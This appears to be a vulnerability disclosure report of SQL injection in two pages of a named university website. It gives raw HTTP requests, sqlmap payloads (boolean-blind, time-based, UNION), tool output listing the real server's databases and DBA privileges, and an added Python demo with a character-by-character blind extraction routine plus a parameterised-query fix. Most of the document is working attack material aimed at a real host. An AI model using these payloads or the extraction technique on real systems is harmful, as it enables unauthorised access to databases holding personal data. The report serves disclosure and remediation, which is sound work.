2015-12-20: Details reported to the vendor, awaiting vendor response
2015-12-21: Vendor confirmed the issue; details disclosed to the vendor only
2015-12-31: Details disclosed to core white hats and relevant domain experts
2016-01-10: Details disclosed to regular white hats
2016-01-20: Details disclosed to intern white hats
2016-02-01: Details disclosed to the public
POST request:

POST /se/shiyanban2.php HTTP/1.1
X-Forwarded-For: 8.8.8.8'
Content-Length: 327
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://econ.sufe.edu.cn:80/
Cookie: PHPSESSID=veicn0egtruldtc4bnbn97nf01
Host: econ.sufe.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

tijiao=%e6%8f%90%e4%ba%a4&dianhua=1&dizhi=1&gaokao=1&gaozhong=1&geren=1&jiangli=1&jiazhang=1&jzdianhua=1&shenfenid=&shengyuan=1&xingbie=%e5%a5%b3&xingming=1&xuehao=1&xuexi=1&youxiang=1&yuanxi=1
The shenfenid parameter is injectable.

The database is the same one as in http://www.wooyun.org/bugs/wooyun-2015-0162743, so no screenshots here. Took a look at the database privileges:
POST parameter 'shenfenid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 2152 HTTP(s) requests:
---
Parameter: shenfenid (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: tijiao=%e6%8f%90%e4%ba%a4&dianhua=1&dizhi=1&gaokao=1&gaozhong=1&geren=1&jiangli=1&jiazhang=1&jzdianhua=1&shenfenid=' AND 3366=3366 AND 'LxCT'='LxCT&shengyuan=1&xingbie=%e5%a5%b3&xingming=1&xuehao=1&xuexi=1&youxiang=1&yuanxi=1

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: tijiao=%e6%8f%90%e4%ba%a4&dianhua=1&dizhi=1&gaokao=1&gaozhong=1&geren=1&jiangli=1&jiazhang=1&jzdianhua=1&shenfenid=' AND (SELECT * FROM (SELECT(SLEEP(5)))UoJl) AND 'xoza'='xoza&shengyuan=1&xingbie=%e5%a5%b3&xingming=1&xuehao=1&xuexi=1&youxiang=1&yuanxi=1
---
[17:46:42] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[17:46:42] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.3.4
back-end DBMS: MySQL >= 5.0.12
[17:46:42] [INFO] fetching database names
[17:46:42] [INFO] fetching number of databases
[17:46:42] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[17:46:42] [INFO] retrieved: 8
[17:46:46] [INFO] retrieved: information_schema
[17:47:50] [INFO] retrieved: mysql
[17:48:12] [INFO] retrieved: performance_schema
[17:49:20] [INFO] retrieved: sakila
[17:49:41] [INFO] retrieved: shufe
[17:50:07] [INFO] retrieved: sufe
[17:50:24] [INFO] retrieved: test
[17:50:40] [INFO] retrieved: world
available databases [8]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sakila
[*] shufe
[*] sufe
[*] test
[*] world
[17:51:02] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\econ.sufe.edu.cn'
[*] shutting down at 17:51:02
0x02 request:

GET /se/sz/szdw_con.php?id=-1&xibie=3 HTTP/1.1
X-Forwarded-For: 8.8.8.8'
X-Requested-With: XMLHttpRequest
Referer: http://econ.sufe.edu.cn:80/
Cookie: PHPSESSID=veicn0egtruldtc4bnbn97nf01
Host: econ.sufe.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
The id parameter is injectable.

Took a look at the data volume.

Then checked the privileges: DBA privileges.
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 400 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: http://econ.sufe.edu.cn:80/se/sz/szdw_con.php?id=-2126 OR 8984=8984&xibie=3

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (SELECT)
    Payload: http://econ.sufe.edu.cn:80/se/sz/szdw_con.php?id=-1 OR (SELECT * FROM (SELECT(SLEEP(5)))dMfI)&xibie=3

    Type: UNION query
    Title: MySQL UNION query (random number) - 18 columns
    Payload: http://econ.sufe.edu.cn:80/se/sz/szdw_con.php?id=-1 UNION ALL SELECT 2121,2121,2121,2121,2121,2121,2121,CONCAT(0x717a706a71,0x6b6973726c6d714d7978,0x717a6a7171),2121,2121,2121,2121,2121,2121,2121,2121,2121,2121#&xibie=3
---
[17:44:57] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[17:44:57] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.3.4
back-end DBMS: MySQL >= 5.0.12
[17:44:57] [INFO] fetching database names
[17:44:59] [INFO] the SQL query used returns 8 entries
[17:44:59] [INFO] starting 8 threads
[17:45:00] [INFO] retrieved: world
[17:45:00] [INFO] retrieved: sakila
[17:45:00] [INFO] retrieved: performance_schema
[17:45:01] [INFO] retrieved: mysql
[17:45:01] [INFO] retrieved: test
[17:45:01] [INFO] retrieved: sufe
[17:45:02] [INFO] retrieved: information_schema
[17:45:02] [INFO] retrieved: shufe
available databases [8]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sakila
[*] shufe
[*] sufe
[*] test
[*] world
[17:45:02] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\econ.sufe.edu.cn'
[*] shutting down at 17:45:02
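The two sqlmap runs above show the same bug in two contexts: a quoted string parameter (shenfenid in shiyanban2.php, payload `' AND 3366=3366 AND 'LxCT'='LxCT`) and a bare numeric parameter (id in szdw_con.php, payload `-2126 OR 8984=8984`). The following is an added example, not code from the report or from the econ.sufe.edu.cn site: it rebuilds both vulnerable query shapes against an in-memory sqlite3 database standing in for the MySQL backend, turns the numeric one into a boolean oracle and uses it to extract a string character by character, which is the inference sqlmap performed to list the eight databases, and shows the parameterised fix. Table and column names, sample rows and the sqlite `unicode(substr(...))` probe (MySQL's `ORD(MID(...))`) are assumptions made for the example.

```python
"""Added example (not code from the report or from econ.sufe.edu.cn):
the two injection contexts sqlmap found, rebuilt against an in-memory
sqlite3 database that stands in for the site's MySQL backend, plus a
boolean-blind oracle and the parameterised fix. Table and column names
are assumptions chosen to mirror the request parameters (shenfenid, id)."""
import sqlite3

# Constructed sample rows; nothing here comes from the target.
SZDW_ROWS = [(1, "Staff A"), (2, "Staff B"), (3, "Staff C")]
STUDENT_ROWS = [(1, "Zhang San", "310101200001010011")]


def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE szdw (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("CREATE TABLE students (xuehao INTEGER, xingming TEXT, shenfenid TEXT)")
    conn.executemany("INSERT INTO szdw VALUES (?, ?)", SZDW_ROWS)
    conn.executemany("INSERT INTO students VALUES (?, ?, ?)", STUDENT_ROWS)
    return conn


def szdw_con_vulnerable(conn, id_param):
    """Numeric context (szdw_con.php?id=...): no quotes to escape, so
    `-2126 OR 8984=8984` is spliced straight into the WHERE clause."""
    return conn.execute("SELECT id, title FROM szdw WHERE id=" + id_param).fetchall()


def shiyanban2_vulnerable(conn, shenfenid):
    """Quoted context (shiyanban2.php shenfenid=...): the payload closes the
    opening quote, and its trailing 'LxCT'='LxCT re-balances the closing quote
    the code appends."""
    sql = "SELECT xuehao, xingming FROM students WHERE shenfenid='" + shenfenid + "'"
    return conn.execute(sql).fetchall()


def szdw_con_safe(conn, id_param):
    """Fix: coerce the type, then bind. int() raises ValueError on the OR
    payload, and a bound value can never alter the statement's structure."""
    return conn.execute("SELECT id, title FROM szdw WHERE id=?", (int(id_param),)).fetchall()


def shiyanban2_safe(conn, shenfenid):
    """Fix for the string context: with a bound parameter the quotes are data."""
    sql = "SELECT xuehao, xingming FROM students WHERE shenfenid=?"
    return conn.execute(sql, (shenfenid,)).fetchall()


def boolean_oracle(conn, condition):
    """True iff `condition` evaluates true inside the database. id=-1 matches
    nothing, so the OR branch alone decides whether any row comes back; that
    difference is the signal behind sqlmap's 'OR boolean-based blind' type."""
    return len(szdw_con_vulnerable(conn, "-1 OR (" + condition + ")")) > 0


def extract_string(conn, subquery, max_len=64):
    """Recover the result of `subquery` one character at a time, seven oracle
    queries per character via binary search on the code point (ASCII only).
    MySQL would spell the probe ORD(MID(...)); sqlite spells it unicode(substr(...))."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            probe = "unicode(substr((%s),%d,1)) > %d" % (subquery, pos, mid)
            if boolean_oracle(conn, probe):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:  # past the end: substr() yields '', unicode('') is NULL, probe never true
            break
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = setup_db()
    print(szdw_con_vulnerable(db, "-2126 OR 8984=8984"))  # every row: condition true
    print(szdw_con_vulnerable(db, "-2126 OR 8984=8985"))  # no rows: condition false
    # The same inference sqlmap used to pull the database list, against sqlite's catalogue.
    print(extract_string(db, "SELECT name FROM sqlite_master WHERE type='table' ORDER BY name LIMIT 1"))
    print(shiyanban2_vulnerable(db, "310101200001010011' AND 3366=3366 AND 'LxCT'='LxCT"))
    print(shiyanban2_safe(db, "310101200001010011' AND 3366=3366 AND 'LxCT'='LxCT"))
```

The oracle needs only "rows or no rows", which is why a 404-style difference in page content is enough for sqlmap's boolean-based mode; when even that is absent it falls back to the SLEEP(5) time-based payloads shown above. Binding parameters fixes both endpoints regardless of which comparison or UNION trick is used, and the int() coercion on id additionally rejects the payload before it reaches the database.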
Severity: High
Vulnerability Rank: 12
Confirmed: 2015-12-21 08:29
Thanks for the heads-up; the responsible party has been notified to handle it.
None yet